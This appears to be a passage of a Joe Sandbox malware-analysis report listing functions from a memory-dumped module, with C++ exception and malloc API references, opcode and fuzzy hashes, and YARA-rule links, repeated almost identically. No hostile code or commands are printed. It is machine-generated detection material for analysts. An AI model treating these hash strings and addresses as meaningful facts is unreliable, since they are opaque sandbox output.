                                                                                                          • API String ID: 2299493649-2241063504
                                                                                                          • Opcode ID: da450a8a71c800b9962f3379d138731f3062fcb795532100f49b10e48d307886
                                                                                                          • Instruction ID: 202b0ba4fe5a4bace8bb25fa419cd1a54485696489ae513891b55e8b0f33d8ed
                                                                                                          • Opcode Fuzzy Hash: da450a8a71c800b9962f3379d138731f3062fcb795532100f49b10e48d307886
                                                                                                          • Instruction Fuzzy Hash: 7CF0A77681020C6BDB14EF98E801BDA77FCAF55340F40C16AEC199B245EF31E6048BE5
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F025B90 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 6F089BB5: _malloc.LIBCMT ref: 6F089BCF
                                                                                                          • std::exception::exception.LIBCMT ref: 6F025BB8
                                                                                                            • Part of subcall function 6F089533: std::exception::_Copy_str.LIBCMT ref: 6F08954E
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 6F025BCD
                                                                                                            • Part of subcall function 6F08AC75: RaiseException.KERNEL32(?,?,6F089C34,F6D10407,?,?,?,?,6F089C34,F6D10407,6F0B9C90,6F0CB974,F6D10407), ref: 6F08ACB7
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Copy_strExceptionException@8RaiseThrow_mallocstd::exception::_std::exception::exception
                                                                                                          • String ID: 0Bo
                                                                                                          • API String ID: 2299493649-2241063504
                                                                                                          • Opcode ID: 96417c9a5aee84e5fff7c4ba3554e53974db3ee94f56f965fce81c865d943108
                                                                                                          • Instruction ID: e739f03a3e6287e06a50e0d7d1e6255f75bb74aa6b8178792a21de2bb388b8ae
                                                                                                          • Opcode Fuzzy Hash: 96417c9a5aee84e5fff7c4ba3554e53974db3ee94f56f965fce81c865d943108
                                                                                                          • Instruction Fuzzy Hash: 17F08276804208ABDB05EF98D801BDA77F8AF55340F40C16AE8199B254EB31E6148BE5
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F039A70 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 6F089BB5: _malloc.LIBCMT ref: 6F089BCF
                                                                                                          • std::exception::exception.LIBCMT ref: 6F039A98
                                                                                                            • Part of subcall function 6F089533: std::exception::_Copy_str.LIBCMT ref: 6F08954E
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 6F039AAD
                                                                                                            • Part of subcall function 6F08AC75: RaiseException.KERNEL32(?,?,6F089C34,F6D10407,?,?,?,?,6F089C34,F6D10407,6F0B9C90,6F0CB974,F6D10407), ref: 6F08ACB7
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Copy_strExceptionException@8RaiseThrow_mallocstd::exception::_std::exception::exception
                                                                                                          • String ID: 0Bo
                                                                                                          • API String ID: 2299493649-2241063504
                                                                                                          • Opcode ID: d2de4ef6d08764d3572b95e55fdab965a3fe516c7614abe64736beba104d66c7
                                                                                                          • Instruction ID: 77d31212a6a5fb4af8a417816cdab90a4db7887eec435d723ccc3534aec74439
                                                                                                          • Opcode Fuzzy Hash: d2de4ef6d08764d3572b95e55fdab965a3fe516c7614abe64736beba104d66c7
                                                                                                          • Instruction Fuzzy Hash: 9CF0A7768042096ACB04DF98D841BCA7BFC5F15344F40C1AAEC599B285FF71E604CBE1
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F039AF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 6F089BB5: _malloc.LIBCMT ref: 6F089BCF
                                                                                                          • std::exception::exception.LIBCMT ref: 6F039B18
                                                                                                            • Part of subcall function 6F089533: std::exception::_Copy_str.LIBCMT ref: 6F08954E
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 6F039B2D
                                                                                                            • Part of subcall function 6F08AC75: RaiseException.KERNEL32(?,?,6F089C34,F6D10407,?,?,?,?,6F089C34,F6D10407,6F0B9C90,6F0CB974,F6D10407), ref: 6F08ACB7
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Copy_strExceptionException@8RaiseThrow_mallocstd::exception::_std::exception::exception
                                                                                                          • String ID: 0Bo
                                                                                                          • API String ID: 2299493649-2241063504
                                                                                                          • Opcode ID: 014349c0b3c4dbd473e887bdff649da35ff70d9b74a3f52b721cc0de49e5821d
                                                                                                          • Instruction ID: e9b5933bf1d47d1f117223cf5cdfb7cd0a44bee81d29cc274509118ef36a245f
                                                                                                          • Opcode Fuzzy Hash: 014349c0b3c4dbd473e887bdff649da35ff70d9b74a3f52b721cc0de49e5821d
                                                                                                          • Instruction Fuzzy Hash: 5CF082B6804208ABDB04DF98D941BCA77F8AF55340F40C16AE8199B244EF31A6048BA1
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F0399F0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 6F089BB5: _malloc.LIBCMT ref: 6F089BCF
                                                                                                          • std::exception::exception.LIBCMT ref: 6F039A18
                                                                                                            • Part of subcall function 6F089533: std::exception::_Copy_str.LIBCMT ref: 6F08954E
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 6F039A2D
                                                                                                            • Part of subcall function 6F08AC75: RaiseException.KERNEL32(?,?,6F089C34,F6D10407,?,?,?,?,6F089C34,F6D10407,6F0B9C90,6F0CB974,F6D10407), ref: 6F08ACB7
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Copy_strExceptionException@8RaiseThrow_mallocstd::exception::_std::exception::exception
                                                                                                          • String ID: 0Bo
                                                                                                          • API String ID: 2299493649-2241063504
                                                                                                          • Opcode ID: 805e5aafdaf59fe7df5585d708ca5d85d6c673bd487f806b2fee1fd27d777a74
                                                                                                          • Instruction ID: b1d88ce767689a91bcfafbb454fa9d42b4064d145ae905e8d7ba691f72e717f8
                                                                                                          • Opcode Fuzzy Hash: 805e5aafdaf59fe7df5585d708ca5d85d6c673bd487f806b2fee1fd27d777a74
                                                                                                          • Instruction Fuzzy Hash: 04F082768042086BDB04DF98D841BCA77F8AF55340F40C26AEC199B244EF31E6048BE1
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F05AFA0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • std::exception::exception.LIBCMT ref: 6F05AFE2
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 6F05AFF9
                                                                                                            • Part of subcall function 6F089BB5: _malloc.LIBCMT ref: 6F089BCF
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Exception@8Throw_mallocstd::exception::exception
                                                                                                          • String ID: 0Bo
                                                                                                          • API String ID: 4063778783-2241063504
                                                                                                          • Opcode ID: 091aa1d55d9e4f70d542e48e06110a293f9394b5562af5036aa7ffbf3a0ae096
                                                                                                          • Instruction ID: 50a3711a2b642a58f98cae19c495b8fa530aed62aeaa9ff810b6187418e04cdf
                                                                                                          • Opcode Fuzzy Hash: 091aa1d55d9e4f70d542e48e06110a293f9394b5562af5036aa7ffbf3a0ae096
                                                                                                          • Instruction Fuzzy Hash: D1F082B62043016BE708DFE4DE517AAB3E49F90704F44442C9449C2194FB78E558C723
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F05AF40 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 27COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • std::exception::exception.LIBCMT ref: 6F05AF7A
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 6F05AF91
                                                                                                            • Part of subcall function 6F089BB5: _malloc.LIBCMT ref: 6F089BCF
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Exception@8Throw_mallocstd::exception::exception
                                                                                                          • String ID: 0Bo
                                                                                                          • API String ID: 4063778783-2241063504
                                                                                                          • Opcode ID: 5c6929cec32e861d1add08a5edd8c6eb129334000e65097fa5dd54e9c2d35c23
                                                                                                          • Instruction ID: df47fe1f1d708773fbfb873225355b6e37555454b97444c32157aa16e2c34015
                                                                                                          • Opcode Fuzzy Hash: 5c6929cec32e861d1add08a5edd8c6eb129334000e65097fa5dd54e9c2d35c23
                                                                                                          • Instruction Fuzzy Hash: 27F0A0B26043026BD744DFA4DA50B6BB3E4AF90644F50882CE84982284FB70E6188623
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F0249C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 27COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • std::exception::exception.LIBCMT ref: 6F0249EF
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 6F024A04
                                                                                                            • Part of subcall function 6F089BB5: _malloc.LIBCMT ref: 6F089BCF
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Exception@8Throw_mallocstd::exception::exception
                                                                                                          • String ID: 0Bo
                                                                                                          • API String ID: 4063778783-2241063504
                                                                                                          • Opcode ID: 70f8876678190cea3157f1a2b1010798dc1df8dcb02c28a6ea8d2af0c7e0fc0f
                                                                                                          • Instruction ID: bee43b545cce7f07818bd11bbbba75d0fcccbd6231ec5e5192110538db32b99f
                                                                                                          • Opcode Fuzzy Hash: 70f8876678190cea3157f1a2b1010798dc1df8dcb02c28a6ea8d2af0c7e0fc0f
                                                                                                          • Instruction Fuzzy Hash: 99E0657991420876DF08DFE4D851BDEB7F8AF10354F50426DAD25561C5EB31E2048AA5
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F093EA4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26COMMONLIBRARYCODE
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: NameName::
                                                                                                          • String ID: {flat}
                                                                                                          • API String ID: 1333004437-2606204563
                                                                                                          • Opcode ID: 6da3c8b23e72e3372e4c2dcc084fba0400b149fe56884a643289d1bb4b8c9fe7
                                                                                                          • Instruction ID: 2f03cab96663a4e6bcd5e4f2d84744c81acf7e7009cef60d086234367821a57f
                                                                                                          • Opcode Fuzzy Hash: 6da3c8b23e72e3372e4c2dcc084fba0400b149fe56884a643289d1bb4b8c9fe7
                                                                                                          • Instruction Fuzzy Hash: 9CF0E5711402449FCB11CF58C451BEC3BE99B4A35AF04D082F98C0F282C732E842EF51
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F080E20 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • std::exception::exception.LIBCMT ref: 6F080E5A
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 6F080E71
                                                                                                            • Part of subcall function 6F089BB5: _malloc.LIBCMT ref: 6F089BCF
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Exception@8Throw_mallocstd::exception::exception
                                                                                                          • String ID: 0Bo
                                                                                                          • API String ID: 4063778783-2241063504
                                                                                                          • Opcode ID: d3908888ddd2b42f87fdba8194fa4f5267c5e634e6f41e4bba66c627b53a7826
                                                                                                          • Instruction ID: fd5c4959b69deb034cc6cec0c1e3c587d05ab667b993f02a65b50c3258f8ff67
                                                                                                          • Opcode Fuzzy Hash: d3908888ddd2b42f87fdba8194fa4f5267c5e634e6f41e4bba66c627b53a7826
                                                                                                          • Instruction Fuzzy Hash: 6FE09B75409301ABDB08DFA0E950B5FB3F5AF95748F40892DE869421D4F731E60CC653
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F083640 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • std::exception::exception.LIBCMT ref: 6F083676
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 6F08368D
                                                                                                            • Part of subcall function 6F089BB5: _malloc.LIBCMT ref: 6F089BCF
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Exception@8Throw_mallocstd::exception::exception
                                                                                                          • String ID: 0Bo
                                                                                                          • API String ID: 4063778783-2241063504
                                                                                                          • Opcode ID: 71b5eafd678cabcf91dd15164b1a4473ea3f81ed7170baf9659400231fa4f09f
                                                                                                          • Instruction ID: 50da4e2686c5f0a5af54dbdc9aff853c7ef7c78ff7cb9a763630bd75ce0fbb5d
                                                                                                          • Opcode Fuzzy Hash: 71b5eafd678cabcf91dd15164b1a4473ea3f81ed7170baf9659400231fa4f09f
                                                                                                          • Instruction Fuzzy Hash: C8E0E57500430166DB04DFA4D555B5BB3E4AFD4748F40892CE879422C4FB30E218C613
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F05B050 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • std::exception::exception.LIBCMT ref: 6F05B086
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 6F05B09D
                                                                                                            • Part of subcall function 6F089BB5: _malloc.LIBCMT ref: 6F089BCF
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Exception@8Throw_mallocstd::exception::exception
                                                                                                          • String ID: 0Bo
                                                                                                          • API String ID: 4063778783-2241063504
                                                                                                          • Opcode ID: 016b1e4fc6c5eb05791536bc0a51325287a2361352b5b08f902cbb98c161a1ed
                                                                                                          • Instruction ID: 08282dc4d6a7083e9c167419fea14403d515a785151604af9b49a18c5e67f4a7
                                                                                                          • Opcode Fuzzy Hash: 016b1e4fc6c5eb05791536bc0a51325287a2361352b5b08f902cbb98c161a1ed
                                                                                                          • Instruction Fuzzy Hash: 2FE06DB600830166E708DBA0EA50B6BB3E4AF90758F404A3CE96A421C4EB71F61CC663
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F037680 Relevance: 5.1, APIs: 4, Instructions: 71COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
